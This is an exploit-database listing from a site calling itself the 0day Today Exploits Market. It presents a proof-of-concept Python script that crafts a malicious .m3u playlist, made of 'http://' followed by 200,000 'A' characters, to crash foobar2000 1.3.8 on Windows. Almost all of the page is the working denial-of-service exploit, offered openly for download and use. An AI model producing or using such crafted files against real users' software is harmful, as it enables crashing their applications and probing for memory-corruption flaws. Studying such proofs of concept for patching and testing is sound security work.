[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

foobar2000 1.3.8 (.m3u) Local Crash PoC

Author
0neb1n
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-23747
Category
dos / poc
Date add
14-06-2015
Platform
windows
# Exploit Title: foobar2000 1.3.8 (.m3u) Local Crash PoC
# Date: 12-06-2015
# Exploit Author: 0neb1n
# Vendor Homepage: http://www.foobar2000.org/
# Software Link: http://www.foobar2000.org/getfile/e246984718ab7ab58fa1e0b072ff05a4/foobar2000_v1.3.8.exe
# Version: 1.3.8
# Tested on: Windows XP SP3 KOR
 
file = "poc.m3u"
 
data = 'http://' + '\x41' * 200000
 
fd = open(file, 'w')
fd.write(data)
fd.close()
print ""
print "[*] File successfully created !!"
print "[*] Author : 0neb1n"
print "[*] Mail : barcodecrow(at)gmail(dot)com"

#  0day.today [2024-10-05]  #